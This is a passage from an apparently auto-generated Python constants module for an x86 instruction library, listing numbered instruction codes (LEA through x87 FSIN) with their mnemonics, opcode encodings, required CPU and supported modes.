``LEA r32, m``
``o32 8D /r``
``386+``
``16/32/64-bit``
"""
LEA_R64_M: int = 292
"""
``LEA r64, m``
``o64 8D /r``
``X64``
``64-bit``
"""
MOV_SREG_RM16: int = 293
"""
``MOV Sreg, r/m16``
``o16 8E /r``
``8086+``
``16/32/64-bit``
"""
MOV_SREG_R32M16: int = 294
"""
``MOV Sreg, r32/m16``
``o32 8E /r``
``386+``
``16/32/64-bit``
"""
MOV_SREG_R64M16: int = 295
"""
``MOV Sreg, r64/m16``
``o64 8E /r``
``X64``
``64-bit``
"""
POP_RM16: int = 296
"""
``POP r/m16``
``o16 8F /0``
``8086+``
``16/32/64-bit``
"""
POP_RM32: int = 297
"""
``POP r/m32``
``o32 8F /0``
``386+``
``16/32-bit``
"""
POP_RM64: int = 298
"""
``POP r/m64``
``o64 8F /0``
``X64``
``64-bit``
"""
NOPW: int = 299
"""
``NOP``
``o16 90``
``8086+``
``16/32/64-bit``
"""
NOPD: int = 300
"""
``NOP``
``o32 90``
``8086+``
``16/32/64-bit``
"""
NOPQ: int = 301
"""
``NOP``
``o64 90``
``8086+``
``64-bit``
"""
XCHG_R16_AX: int = 302
"""
``XCHG r16, AX``
``o16 90+rw``
``8086+``
``16/32/64-bit``
"""
XCHG_R32_EAX: int = 303
"""
``XCHG r32, EAX``
``o32 90+rd``
``386+``
``16/32/64-bit``
"""
XCHG_R64_RAX: int = 304
"""
``XCHG r64, RAX``
``o64 90+ro``
``X64``
``64-bit``
"""
PAUSE: int = 305
"""
``PAUSE``
``F3 90``
``Pentium 4 or later``
``16/32/64-bit``
"""
CBW: int = 306
"""
``CBW``
``o16 98``
``8086+``
``16/32/64-bit``
"""
CWDE: int = 307
"""
``CWDE``
``o32 98``
``386+``
``16/32/64-bit``
"""
CDQE: int = 308
"""
``CDQE``
``o64 98``
``X64``
``64-bit``
"""
CWD: int = 309
"""
``CWD``
``o16 99``
``8086+``
``16/32/64-bit``
"""
CDQ: int = 310
"""
``CDQ``
``o32 99``
``386+``
``16/32/64-bit``
"""
CQO: int = 311
"""
``CQO``
``o64 99``
``X64``
``64-bit``
"""
CALL_PTR1616: int = 312
"""
``CALL ptr16:16``
``o16 9A cd``
``8086+``
``16/32-bit``
"""
CALL_PTR1632: int = 313
"""
``CALL ptr16:32``
``o32 9A cp``
``386+``
``16/32-bit``
"""
WAIT: int = 314
"""
``WAIT``
``9B``
``8086+``
``16/32/64-bit``
"""
PUSHFW: int = 315
"""
``PUSHF``
``o16 9C``
``8086+``
``16/32/64-bit``
"""
PUSHFD: int = 316
"""
``PUSHFD``
``o32 9C``
``386+``
``16/32-bit``
"""
PUSHFQ: int = 317
"""
``PUSHFQ``
``o64 9C``
``X64``
``64-bit``
"""
POPFW: int = 318
"""
``POPF``
``o16 9D``
``8086+``
``16/32/64-bit``
"""
POPFD: int = 319
"""
``POPFD``
``o32 9D``
``386+``
``16/32-bit``
"""
POPFQ: int = 320
"""
``POPFQ``
``o64 9D``
``X64``
``64-bit``
"""
SAHF: int = 321
"""
``SAHF``
``9E``
``8086+``
``16/32/64-bit``
"""
LAHF: int = 322
"""
``LAHF``
``9F``
``8086+``
``16/32/64-bit``
"""
MOV_AL_MOFFS8: int = 323
"""
``MOV AL, moffs8``
``A0 mo``
``8086+``
``16/32/64-bit``
"""
MOV_AX_MOFFS16: int = 324
"""
``MOV AX, moffs16``
``o16 A1 mo``
``8086+``
``16/32/64-bit``
"""
MOV_EAX_MOFFS32: int = 325
"""
``MOV EAX, moffs32``
``o32 A1 mo``
``386+``
``16/32/64-bit``
"""
MOV_RAX_MOFFS64: int = 326
"""
``MOV RAX, moffs64``
``o64 A1 mo``
``X64``
``64-bit``
"""
MOV_MOFFS8_AL: int = 327
"""
``MOV moffs8, AL``
``A2 mo``
``8086+``
``16/32/64-bit``
"""
MOV_MOFFS16_AX: int = 328
"""
``MOV moffs16, AX``
``o16 A3 mo``
``8086+``
``16/32/64-bit``
"""
MOV_MOFFS32_EAX: int = 329
"""
``MOV moffs32, EAX``
``o32 A3 mo``
``386+``
``16/32/64-bit``
"""
MOV_MOFFS64_RAX: int = 330
"""
``MOV moffs64, RAX``
``o64 A3 mo``
``X64``
``64-bit``
"""
MOVSB_M8_M8: int = 331
"""
``MOVSB``
``A4``
``8086+``
``16/32/64-bit``
"""
MOVSW_M16_M16: int = 332
"""
``MOVSW``
``o16 A5``
``8086+``
``16/32/64-bit``
"""
MOVSD_M32_M32: int = 333
"""
``MOVSD``
``o32 A5``
``386+``
``16/32/64-bit``
"""
MOVSQ_M64_M64: int = 334
"""
``MOVSQ``
``o64 A5``
``X64``
``64-bit``
"""
CMPSB_M8_M8: int = 335
"""
``CMPSB``
``A6``
``8086+``
``16/32/64-bit``
"""
CMPSW_M16_M16: int = 336
"""
``CMPSW``
``o16 A7``
``8086+``
``16/32/64-bit``
"""
CMPSD_M32_M32: int = 337
"""
``CMPSD``
``o32 A7``
``386+``
``16/32/64-bit``
"""
CMPSQ_M64_M64: int = 338
"""
``CMPSQ``
``o64 A7``
``X64``
``64-bit``
"""
TEST_AL_IMM8: int = 339
"""
``TEST AL, imm8``
``A8 ib``
``8086+``
``16/32/64-bit``
"""
TEST_AX_IMM16: int = 340
"""
``TEST AX, imm16``
``o16 A9 iw``
``8086+``
``16/32/64-bit``
"""
TEST_EAX_IMM32: int = 341
"""
``TEST EAX, imm32``
``o32 A9 id``
``386+``
``16/32/64-bit``
"""
TEST_RAX_IMM32: int = 342
"""
``TEST RAX, imm32``
``o64 A9 id``
``X64``
``64-bit``
"""
STOSB_M8_AL: int = 343
"""
``STOSB``
``AA``
``8086+``
``16/32/64-bit``
"""
STOSW_M16_AX: int = 344
"""
``STOSW``
``o16 AB``
``8086+``
``16/32/64-bit``
"""
STOSD_M32_EAX: int = 345
"""
``STOSD``
``o32 AB``
``386+``
``16/32/64-bit``
"""
STOSQ_M64_RAX: int = 346
"""
``STOSQ``
``o64 AB``
``X64``
``64-bit``
"""
LODSB_AL_M8: int = 347
"""
``LODSB``
``AC``
``8086+``
``16/32/64-bit``
"""
LODSW_AX_M16: int = 348
"""
``LODSW``
``o16 AD``
``8086+``
``16/32/64-bit``
"""
LODSD_EAX_M32: int = 349
"""
``LODSD``
``o32 AD``
``386+``
``16/32/64-bit``
"""
LODSQ_RAX_M64: int = 350
"""
``LODSQ``
``o64 AD``
``X64``
``64-bit``
"""
SCASB_AL_M8: int = 351
"""
``SCASB``
``AE``
``8086+``
``16/32/64-bit``
"""
SCASW_AX_M16: int = 352
"""
``SCASW``
``o16 AF``
``8086+``
``16/32/64-bit``
"""
SCASD_EAX_M32: int = 353
"""
``SCASD``
``o32 AF``
``386+``
``16/32/64-bit``
"""
SCASQ_RAX_M64: int = 354
"""
``SCASQ``
``o64 AF``
``X64``
``64-bit``
"""
MOV_R8_IMM8: int = 355
"""
``MOV r8, imm8``
``B0+rb ib``
``8086+``
``16/32/64-bit``
"""
MOV_R16_IMM16: int = 356
"""
``MOV r16, imm16``
``o16 B8+rw iw``
``8086+``
``16/32/64-bit``
"""
MOV_R32_IMM32: int = 357
"""
``MOV r32, imm32``
``o32 B8+rd id``
``386+``
``16/32/64-bit``
"""
MOV_R64_IMM64: int = 358
"""
``MOV r64, imm64``
``o64 B8+ro io``
``X64``
``64-bit``
"""
ROL_RM8_IMM8: int = 359
"""
``ROL r/m8, imm8``
``C0 /0 ib``
``186+``
``16/32/64-bit``
"""
ROR_RM8_IMM8: int = 360
"""
``ROR r/m8, imm8``
``C0 /1 ib``
``186+``
``16/32/64-bit``
"""
RCL_RM8_IMM8: int = 361
"""
``RCL r/m8, imm8``
``C0 /2 ib``
``186+``
``16/32/64-bit``
"""
RCR_RM8_IMM8: int = 362
"""
``RCR r/m8, imm8``
``C0 /3 ib``
``186+``
``16/32/64-bit``
"""
SHL_RM8_IMM8: int = 363
"""
``SHL r/m8, imm8``
``C0 /4 ib``
``186+``
``16/32/64-bit``
"""
SHR_RM8_IMM8: int = 364
"""
``SHR r/m8, imm8``
``C0 /5 ib``
``186+``
``16/32/64-bit``
"""
SAL_RM8_IMM8: int = 365
"""
``SAL r/m8, imm8``
``C0 /6 ib``
``186+``
``16/32/64-bit``
"""
SAR_RM8_IMM8: int = 366
"""
``SAR r/m8, imm8``
``C0 /7 ib``
``186+``
``16/32/64-bit``
"""
ROL_RM16_IMM8: int = 367
"""
``ROL r/m16, imm8``
``o16 C1 /0 ib``
``186+``
``16/32/64-bit``
"""
ROL_RM32_IMM8: int = 368
"""
``ROL r/m32, imm8``
``o32 C1 /0 ib``
``386+``
``16/32/64-bit``
"""
ROL_RM64_IMM8: int = 369
"""
``ROL r/m64, imm8``
``o64 C1 /0 ib``
``X64``
``64-bit``
"""
ROR_RM16_IMM8: int = 370
"""
``ROR r/m16, imm8``
``o16 C1 /1 ib``
``186+``
``16/32/64-bit``
"""
ROR_RM32_IMM8: int = 371
"""
``ROR r/m32, imm8``
``o32 C1 /1 ib``
``386+``
``16/32/64-bit``
"""
ROR_RM64_IMM8: int = 372
"""
``ROR r/m64, imm8``
``o64 C1 /1 ib``
``X64``
``64-bit``
"""
RCL_RM16_IMM8: int = 373
"""
``RCL r/m16, imm8``
``o16 C1 /2 ib``
``186+``
``16/32/64-bit``
"""
RCL_RM32_IMM8: int = 374
"""
``RCL r/m32, imm8``
``o32 C1 /2 ib``
``386+``
``16/32/64-bit``
"""
RCL_RM64_IMM8: int = 375
"""
``RCL r/m64, imm8``
``o64 C1 /2 ib``
``X64``
``64-bit``
"""
RCR_RM16_IMM8: int = 376
"""
``RCR r/m16, imm8``
``o16 C1 /3 ib``
``186+``
``16/32/64-bit``
"""
RCR_RM32_IMM8: int = 377
"""
``RCR r/m32, imm8``
``o32 C1 /3 ib``
``386+``
``16/32/64-bit``
"""
RCR_RM64_IMM8: int = 378
"""
``RCR r/m64, imm8``
``o64 C1 /3 ib``
``X64``
``64-bit``
"""
SHL_RM16_IMM8: int = 379
"""
``SHL r/m16, imm8``
``o16 C1 /4 ib``
``186+``
``16/32/64-bit``
"""
SHL_RM32_IMM8: int = 380
"""
``SHL r/m32, imm8``
``o32 C1 /4 ib``
``386+``
``16/32/64-bit``
"""
SHL_RM64_IMM8: int = 381
"""
``SHL r/m64, imm8``
``o64 C1 /4 ib``
``X64``
``64-bit``
"""
SHR_RM16_IMM8: int = 382
"""
``SHR r/m16, imm8``
``o16 C1 /5 ib``
``186+``
``16/32/64-bit``
"""
SHR_RM32_IMM8: int = 383
"""
``SHR r/m32, imm8``
``o32 C1 /5 ib``
``386+``
``16/32/64-bit``
"""
SHR_RM64_IMM8: int = 384
"""
``SHR r/m64, imm8``
``o64 C1 /5 ib``
``X64``
``64-bit``
"""
SAL_RM16_IMM8: int = 385
"""
``SAL r/m16, imm8``
``o16 C1 /6 ib``
``186+``
``16/32/64-bit``
"""
SAL_RM32_IMM8: int = 386
"""
``SAL r/m32, imm8``
``o32 C1 /6 ib``
``386+``
``16/32/64-bit``
"""
SAL_RM64_IMM8: int = 387
"""
``SAL r/m64, imm8``
``o64 C1 /6 ib``
``X64``
``64-bit``
"""
SAR_RM16_IMM8: int = 388
"""
``SAR r/m16, imm8``
``o16 C1 /7 ib``
``186+``
``16/32/64-bit``
"""
SAR_RM32_IMM8: int = 389
"""
``SAR r/m32, imm8``
``o32 C1 /7 ib``
``386+``
``16/32/64-bit``
"""
SAR_RM64_IMM8: int = 390
"""
``SAR r/m64, imm8``
``o64 C1 /7 ib``
``X64``
``64-bit``
"""
RETNW_IMM16: int = 391
"""
``RET imm16``
``o16 C2 iw``
``8086+``
``16/32/64-bit``
"""
RETND_IMM16: int = 392
"""
``RET imm16``
``o32 C2 iw``
``386+``
``16/32-bit``
"""
RETNQ_IMM16: int = 393
"""
``RET imm16``
``o64 C2 iw``
``X64``
``64-bit``
"""
RETNW: int = 394
"""
``RET``
``o16 C3``
``8086+``
``16/32/64-bit``
"""
RETND: int = 395
"""
``RET``
``o32 C3``
``386+``
``16/32-bit``
"""
RETNQ: int = 396
"""
``RET``
``o64 C3``
``X64``
``64-bit``
"""
LES_R16_M1616: int = 397
"""
``LES r16, m16:16``
``o16 C4 /r``
``8086+``
``16/32-bit``
"""
LES_R32_M1632: int = 398
"""
``LES r32, m16:32``
``o32 C4 /r``
``386+``
``16/32-bit``
"""
LDS_R16_M1616: int = 399
"""
``LDS r16, m16:16``
``o16 C5 /r``
``8086+``
``16/32-bit``
"""
LDS_R32_M1632: int = 400
"""
``LDS r32, m16:32``
``o32 C5 /r``
``386+``
``16/32-bit``
"""
MOV_RM8_IMM8: int = 401
"""
``MOV r/m8, imm8``
``C6 /0 ib``
``8086+``
``16/32/64-bit``
"""
XABORT_IMM8: int = 402
"""
``XABORT imm8``
``C6 F8 ib``
``RTM``
``16/32/64-bit``
"""
MOV_RM16_IMM16: int = 403
"""
``MOV r/m16, imm16``
``o16 C7 /0 iw``
``8086+``
``16/32/64-bit``
"""
MOV_RM32_IMM32: int = 404
"""
``MOV r/m32, imm32``
``o32 C7 /0 id``
``386+``
``16/32/64-bit``
"""
MOV_RM64_IMM32: int = 405
"""
``MOV r/m64, imm32``
``o64 C7 /0 id``
``X64``
``64-bit``
"""
XBEGIN_REL16: int = 406
"""
``XBEGIN rel16``
``o16 C7 F8 cw``
``RTM``
``16/32/64-bit``
"""
XBEGIN_REL32: int = 407
"""
``XBEGIN rel32``
``o32 C7 F8 cd``
``RTM``
``16/32/64-bit``
"""
ENTERW_IMM16_IMM8: int = 408
"""
``ENTER imm16, imm8``
``o16 C8 iw ib``
``186+``
``16/32/64-bit``
"""
ENTERD_IMM16_IMM8: int = 409
"""
``ENTER imm16, imm8``
``o32 C8 iw ib``
``386+``
``16/32-bit``
"""
ENTERQ_IMM16_IMM8: int = 410
"""
``ENTER imm16, imm8``
``o64 C8 iw ib``
``X64``
``64-bit``
"""
LEAVEW: int = 411
"""
``LEAVE``
``o16 C9``
``186+``
``16/32/64-bit``
"""
LEAVED: int = 412
"""
``LEAVE``
``o32 C9``
``386+``
``16/32-bit``
"""
LEAVEQ: int = 413
"""
``LEAVE``
``o64 C9``
``X64``
``64-bit``
"""
RETFW_IMM16: int = 414
"""
``RETF imm16``
``o16 CA iw``
``8086+``
``16/32/64-bit``
"""
RETFD_IMM16: int = 415
"""
``RETF imm16``
``o32 CA iw``
``386+``
``16/32/64-bit``
"""
RETFQ_IMM16: int = 416
"""
``RETF imm16``
``o64 CA iw``
``X64``
``64-bit``
"""
RETFW: int = 417
"""
``RETF``
``o16 CB``
``8086+``
``16/32/64-bit``
"""
RETFD: int = 418
"""
``RETF``
``o32 CB``
``386+``
``16/32/64-bit``
"""
RETFQ: int = 419
"""
``RETF``
``o64 CB``
``X64``
``64-bit``
"""
INT3: int = 420
"""
``INT3``
``CC``
``8086+``
``16/32/64-bit``
"""
INT_IMM8: int = 421
"""
``INT imm8``
``CD ib``
``8086+``
``16/32/64-bit``
"""
INTO: int = 422
"""
``INTO``
``CE``
``8086+``
``16/32-bit``
"""
IRETW: int = 423
"""
``IRET``
``o16 CF``
``8086+``
``16/32/64-bit``
"""
IRETD: int = 424
"""
``IRETD``
``o32 CF``
``386+``
``16/32/64-bit``
"""
IRETQ: int = 425
"""
``IRETQ``
``o64 CF``
``X64``
``64-bit``
"""
ROL_RM8_1: int = 426
"""
``ROL r/m8, 1``
``D0 /0``
``8086+``
``16/32/64-bit``
"""
ROR_RM8_1: int = 427
"""
``ROR r/m8, 1``
``D0 /1``
``8086+``
``16/32/64-bit``
"""
RCL_RM8_1: int = 428
"""
``RCL r/m8, 1``
``D0 /2``
``8086+``
``16/32/64-bit``
"""
RCR_RM8_1: int = 429
"""
``RCR r/m8, 1``
``D0 /3``
``8086+``
``16/32/64-bit``
"""
SHL_RM8_1: int = 430
"""
``SHL r/m8, 1``
``D0 /4``
``8086+``
``16/32/64-bit``
"""
SHR_RM8_1: int = 431
"""
``SHR r/m8, 1``
``D0 /5``
``8086+``
``16/32/64-bit``
"""
SAL_RM8_1: int = 432
"""
``SAL r/m8, 1``
``D0 /6``
``8086+``
``16/32/64-bit``
"""
SAR_RM8_1: int = 433
"""
``SAR r/m8, 1``
``D0 /7``
``8086+``
``16/32/64-bit``
"""
ROL_RM16_1: int = 434
"""
``ROL r/m16, 1``
``o16 D1 /0``
``8086+``
``16/32/64-bit``
"""
ROL_RM32_1: int = 435
"""
``ROL r/m32, 1``
``o32 D1 /0``
``386+``
``16/32/64-bit``
"""
ROL_RM64_1: int = 436
"""
``ROL r/m64, 1``
``o64 D1 /0``
``X64``
``64-bit``
"""
ROR_RM16_1: int = 437
"""
``ROR r/m16, 1``
``o16 D1 /1``
``8086+``
``16/32/64-bit``
"""
ROR_RM32_1: int = 438
"""
``ROR r/m32, 1``
``o32 D1 /1``
``386+``
``16/32/64-bit``
"""
ROR_RM64_1: int = 439
"""
``ROR r/m64, 1``
``o64 D1 /1``
``X64``
``64-bit``
"""
RCL_RM16_1: int = 440
"""
``RCL r/m16, 1``
``o16 D1 /2``
``8086+``
``16/32/64-bit``
"""
RCL_RM32_1: int = 441
"""
``RCL r/m32, 1``
``o32 D1 /2``
``386+``
``16/32/64-bit``
"""
RCL_RM64_1: int = 442
"""
``RCL r/m64, 1``
``o64 D1 /2``
``X64``
``64-bit``
"""
RCR_RM16_1: int = 443
"""
``RCR r/m16, 1``
``o16 D1 /3``
``8086+``
``16/32/64-bit``
"""
RCR_RM32_1: int = 444
"""
``RCR r/m32, 1``
``o32 D1 /3``
``386+``
``16/32/64-bit``
"""
RCR_RM64_1: int = 445
"""
``RCR r/m64, 1``
``o64 D1 /3``
``X64``
``64-bit``
"""
SHL_RM16_1: int = 446
"""
``SHL r/m16, 1``
``o16 D1 /4``
``8086+``
``16/32/64-bit``
"""
SHL_RM32_1: int = 447
"""
``SHL r/m32, 1``
``o32 D1 /4``
``386+``
``16/32/64-bit``
"""
SHL_RM64_1: int = 448
"""
``SHL r/m64, 1``
``o64 D1 /4``
``X64``
``64-bit``
"""
SHR_RM16_1: int = 449
"""
``SHR r/m16, 1``
``o16 D1 /5``
``8086+``
``16/32/64-bit``
"""
SHR_RM32_1: int = 450
"""
``SHR r/m32, 1``
``o32 D1 /5``
``386+``
``16/32/64-bit``
"""
SHR_RM64_1: int = 451
"""
``SHR r/m64, 1``
``o64 D1 /5``
``X64``
``64-bit``
"""
SAL_RM16_1: int = 452
"""
``SAL r/m16, 1``
``o16 D1 /6``
``8086+``
``16/32/64-bit``
"""
SAL_RM32_1: int = 453
"""
``SAL r/m32, 1``
``o32 D1 /6``
``386+``
``16/32/64-bit``
"""
SAL_RM64_1: int = 454
"""
``SAL r/m64, 1``
``o64 D1 /6``
``X64``
``64-bit``
"""
SAR_RM16_1: int = 455
"""
``SAR r/m16, 1``
``o16 D1 /7``
``8086+``
``16/32/64-bit``
"""
SAR_RM32_1: int = 456
"""
``SAR r/m32, 1``
``o32 D1 /7``
``386+``
``16/32/64-bit``
"""
SAR_RM64_1: int = 457
"""
``SAR r/m64, 1``
``o64 D1 /7``
``X64``
``64-bit``
"""
ROL_RM8_CL: int = 458
"""
``ROL r/m8, CL``
``D2 /0``
``8086+``
``16/32/64-bit``
"""
ROR_RM8_CL: int = 459
"""
``ROR r/m8, CL``
``D2 /1``
``8086+``
``16/32/64-bit``
"""
RCL_RM8_CL: int = 460
"""
``RCL r/m8, CL``
``D2 /2``
``8086+``
``16/32/64-bit``
"""
RCR_RM8_CL: int = 461
"""
``RCR r/m8, CL``
``D2 /3``
``8086+``
``16/32/64-bit``
"""
SHL_RM8_CL: int = 462
"""
``SHL r/m8, CL``
``D2 /4``
``8086+``
``16/32/64-bit``
"""
SHR_RM8_CL: int = 463
"""
``SHR r/m8, CL``
``D2 /5``
``8086+``
``16/32/64-bit``
"""
SAL_RM8_CL: int = 464
"""
``SAL r/m8, CL``
``D2 /6``
``8086+``
``16/32/64-bit``
"""
SAR_RM8_CL: int = 465
"""
``SAR r/m8, CL``
``D2 /7``
``8086+``
``16/32/64-bit``
"""
ROL_RM16_CL: int = 466
"""
``ROL r/m16, CL``
``o16 D3 /0``
``8086+``
``16/32/64-bit``
"""
ROL_RM32_CL: int = 467
"""
``ROL r/m32, CL``
``o32 D3 /0``
``386+``
``16/32/64-bit``
"""
ROL_RM64_CL: int = 468
"""
``ROL r/m64, CL``
``o64 D3 /0``
``X64``
``64-bit``
"""
ROR_RM16_CL: int = 469
"""
``ROR r/m16, CL``
``o16 D3 /1``
``8086+``
``16/32/64-bit``
"""
ROR_RM32_CL: int = 470
"""
``ROR r/m32, CL``
``o32 D3 /1``
``386+``
``16/32/64-bit``
"""
ROR_RM64_CL: int = 471
"""
``ROR r/m64, CL``
``o64 D3 /1``
``X64``
``64-bit``
"""
RCL_RM16_CL: int = 472
"""
``RCL r/m16, CL``
``o16 D3 /2``
``8086+``
``16/32/64-bit``
"""
RCL_RM32_CL: int = 473
"""
``RCL r/m32, CL``
``o32 D3 /2``
``386+``
``16/32/64-bit``
"""
RCL_RM64_CL: int = 474
"""
``RCL r/m64, CL``
``o64 D3 /2``
``X64``
``64-bit``
"""
RCR_RM16_CL: int = 475
"""
``RCR r/m16, CL``
``o16 D3 /3``
``8086+``
``16/32/64-bit``
"""
RCR_RM32_CL: int = 476
"""
``RCR r/m32, CL``
``o32 D3 /3``
``386+``
``16/32/64-bit``
"""
RCR_RM64_CL: int = 477
"""
``RCR r/m64, CL``
``o64 D3 /3``
``X64``
``64-bit``
"""
SHL_RM16_CL: int = 478
"""
``SHL r/m16, CL``
``o16 D3 /4``
``8086+``
``16/32/64-bit``
"""
SHL_RM32_CL: int = 479
"""
``SHL r/m32, CL``
``o32 D3 /4``
``386+``
``16/32/64-bit``
"""
SHL_RM64_CL: int = 480
"""
``SHL r/m64, CL``
``o64 D3 /4``
``X64``
``64-bit``
"""
SHR_RM16_CL: int = 481
"""
``SHR r/m16, CL``
``o16 D3 /5``
``8086+``
``16/32/64-bit``
"""
SHR_RM32_CL: int = 482
"""
``SHR r/m32, CL``
``o32 D3 /5``
``386+``
``16/32/64-bit``
"""
SHR_RM64_CL: int = 483
"""
``SHR r/m64, CL``
``o64 D3 /5``
``X64``
``64-bit``
"""
SAL_RM16_CL: int = 484
"""
``SAL r/m16, CL``
``o16 D3 /6``
``8086+``
``16/32/64-bit``
"""
SAL_RM32_CL: int = 485
"""
``SAL r/m32, CL``
``o32 D3 /6``
``386+``
``16/32/64-bit``
"""
SAL_RM64_CL: int = 486
"""
``SAL r/m64, CL``
``o64 D3 /6``
``X64``
``64-bit``
"""
SAR_RM16_CL: int = 487
"""
``SAR r/m16, CL``
``o16 D3 /7``
``8086+``
``16/32/64-bit``
"""
SAR_RM32_CL: int = 488
"""
``SAR r/m32, CL``
``o32 D3 /7``
``386+``
``16/32/64-bit``
"""
SAR_RM64_CL: int = 489
"""
``SAR r/m64, CL``
``o64 D3 /7``
``X64``
``64-bit``
"""
AAM_IMM8: int = 490
"""
``AAM imm8``
``D4 ib``
``8086+``
``16/32-bit``
"""
AAD_IMM8: int = 491
"""
``AAD imm8``
``D5 ib``
``8086+``
``16/32-bit``
"""
SALC: int = 492
"""
``SALC``
``D6``
``8086+``
``16/32-bit``
"""
XLAT_M8: int = 493
"""
``XLATB``
``D7``
``8086+``
``16/32/64-bit``
"""
FADD_M32FP: int = 494
"""
``FADD m32fp``
``D8 /0``
``8087+``
``16/32/64-bit``
"""
FMUL_M32FP: int = 495
"""
``FMUL m32fp``
``D8 /1``
``8087+``
``16/32/64-bit``
"""
FCOM_M32FP: int = 496
"""
``FCOM m32fp``
``D8 /2``
``8087+``
``16/32/64-bit``
"""
FCOMP_M32FP: int = 497
"""
``FCOMP m32fp``
``D8 /3``
``8087+``
``16/32/64-bit``
"""
FSUB_M32FP: int = 498
"""
``FSUB m32fp``
``D8 /4``
``8087+``
``16/32/64-bit``
"""
FSUBR_M32FP: int = 499
"""
``FSUBR m32fp``
``D8 /5``
``8087+``
``16/32/64-bit``
"""
FDIV_M32FP: int = 500
"""
``FDIV m32fp``
``D8 /6``
``8087+``
``16/32/64-bit``
"""
FDIVR_M32FP: int = 501
"""
``FDIVR m32fp``
``D8 /7``
``8087+``
``16/32/64-bit``
"""
FADD_ST0_STI: int = 502
"""
``FADD ST(0), ST(i)``
``D8 C0+i``
``8087+``
``16/32/64-bit``
"""
FMUL_ST0_STI: int = 503
"""
``FMUL ST(0), ST(i)``
``D8 C8+i``
``8087+``
``16/32/64-bit``
"""
FCOM_ST0_STI: int = 504
"""
``FCOM ST(i)``
``D8 D0+i``
``8087+``
``16/32/64-bit``
"""
FCOMP_ST0_STI: int = 505
"""
``FCOMP ST(i)``
``D8 D8+i``
``8087+``
``16/32/64-bit``
"""
FSUB_ST0_STI: int = 506
"""
``FSUB ST(0), ST(i)``
``D8 E0+i``
``8087+``
``16/32/64-bit``
"""
FSUBR_ST0_STI: int = 507
"""
``FSUBR ST(0), ST(i)``
``D8 E8+i``
``8087+``
``16/32/64-bit``
"""
FDIV_ST0_STI: int = 508
"""
``FDIV ST(0), ST(i)``
``D8 F0+i``
``8087+``
``16/32/64-bit``
"""
FDIVR_ST0_STI: int = 509
"""
``FDIVR ST(0), ST(i)``
``D8 F8+i``
``8087+``
``16/32/64-bit``
"""
FLD_M32FP: int = 510
"""
``FLD m32fp``
``D9 /0``
``8087+``
``16/32/64-bit``
"""
FST_M32FP: int = 511
"""
``FST m32fp``
``D9 /2``
``8087+``
``16/32/64-bit``
"""
FSTP_M32FP: int = 512
"""
``FSTP m32fp``
``D9 /3``
``8087+``
``16/32/64-bit``
"""
FLDENV_M14BYTE: int = 513
"""
``FLDENV m14byte``
``o16 D9 /4``
``8087+``
``16/32/64-bit``
"""
FLDENV_M28BYTE: int = 514
"""
``FLDENV m28byte``
``o32 D9 /4``
``387+``
``16/32/64-bit``
"""
FLDCW_M2BYTE: int = 515
"""
``FLDCW m2byte``
``D9 /5``
``8087+``
``16/32/64-bit``
"""
FNSTENV_M14BYTE: int = 516
"""
``FNSTENV m14byte``
``o16 D9 /6``
``8087+``
``16/32/64-bit``
"""
FSTENV_M14BYTE: int = 517
"""
``FSTENV m14byte``
``9B o16 D9 /6``
``8087+``
``16/32/64-bit``
"""
FNSTENV_M28BYTE: int = 518
"""
``FNSTENV m28byte``
``o32 D9 /6``
``387+``
``16/32/64-bit``
"""
FSTENV_M28BYTE: int = 519
"""
``FSTENV m28byte``
``9B o32 D9 /6``
``387+``
``16/32/64-bit``
"""
FNSTCW_M2BYTE: int = 520
"""
``FNSTCW m2byte``
``D9 /7``
``8087+``
``16/32/64-bit``
"""
FSTCW_M2BYTE: int = 521
"""
``FSTCW m2byte``
``9B D9 /7``
``8087+``
``16/32/64-bit``
"""
FLD_STI: int = 522
"""
``FLD ST(i)``
``D9 C0+i``
``8087+``
``16/32/64-bit``
"""
FXCH_ST0_STI: int = 523
"""
``FXCH ST(i)``
``D9 C8+i``
``8087+``
``16/32/64-bit``
"""
FNOP: int = 524
"""
``FNOP``
``D9 D0``
``8087+``
``16/32/64-bit``
"""
FSTPNCE_STI: int = 525
"""
``FSTPNCE ST(i)``
``D9 D8+i``
``8087+``
``16/32/64-bit``
"""
FCHS: int = 526
"""
``FCHS``
``D9 E0``
``8087+``
``16/32/64-bit``
"""
FABS: int = 527
"""
``FABS``
``D9 E1``
``8087+``
``16/32/64-bit``
"""
FTST: int = 528
"""
``FTST``
``D9 E4``
``8087+``
``16/32/64-bit``
"""
FXAM: int = 529
"""
``FXAM``
``D9 E5``
``8087+``
``16/32/64-bit``
"""
FLD1: int = 530
"""
``FLD1``
``D9 E8``
``8087+``
``16/32/64-bit``
"""
FLDL2T: int = 531
"""
``FLDL2T``
``D9 E9``
``8087+``
``16/32/64-bit``
"""
FLDL2E: int = 532
"""
``FLDL2E``
``D9 EA``
``8087+``
``16/32/64-bit``
"""
FLDPI: int = 533
"""
``FLDPI``
``D9 EB``
``8087+``
``16/32/64-bit``
"""
FLDLG2: int = 534
"""
``FLDLG2``
``D9 EC``
``8087+``
``16/32/64-bit``
"""
FLDLN2: int = 535
"""
``FLDLN2``
``D9 ED``
``8087+``
``16/32/64-bit``
"""
FLDZ: int = 536
"""
``FLDZ``
``D9 EE``
``8087+``
``16/32/64-bit``
"""
F2XM1: int = 537
"""
``F2XM1``
``D9 F0``
``8087+``
``16/32/64-bit``
"""
FYL2X: int = 538
"""
``FYL2X``
``D9 F1``
``8087+``
``16/32/64-bit``
"""
FPTAN: int = 539
"""
``FPTAN``
``D9 F2``
``8087+``
``16/32/64-bit``
"""
FPATAN: int = 540
"""
``FPATAN``
``D9 F3``
``8087+``
``16/32/64-bit``
"""
FXTRACT: int = 541
"""
``FXTRACT``
``D9 F4``
``8087+``
``16/32/64-bit``
"""
FPREM1: int = 542
"""
``FPREM1``
``D9 F5``
``387+``
``16/32/64-bit``
"""
FDECSTP: int = 543
"""
``FDECSTP``
``D9 F6``
``8087+``
``16/32/64-bit``
"""
FINCSTP: int = 544
"""
``FINCSTP``
``D9 F7``
``8087+``
``16/32/64-bit``
"""
FPREM: int = 545
"""
``FPREM``
``D9 F8``
``8087+``
``16/32/64-bit``
"""
FYL2XP1: int = 546
"""
``FYL2XP1``
``D9 F9``
``8087+``
``16/32/64-bit``
"""
FSQRT: int = 547
"""
``FSQRT``
``D9 FA``
``8087+``
``16/32/64-bit``
"""
FSINCOS: int = 548
"""
``FSINCOS``
``D9 FB``
``387+``
``16/32/64-bit``
"""
FRNDINT: int = 549
"""
``FRNDINT``
``D9 FC``
``8087+``
``16/32/64-bit``
"""
FSCALE: int = 550
"""
``FSCALE``
``D9 FD``
``8087+``
``16/32/64-bit``
"""
FSIN: int = 551
"""
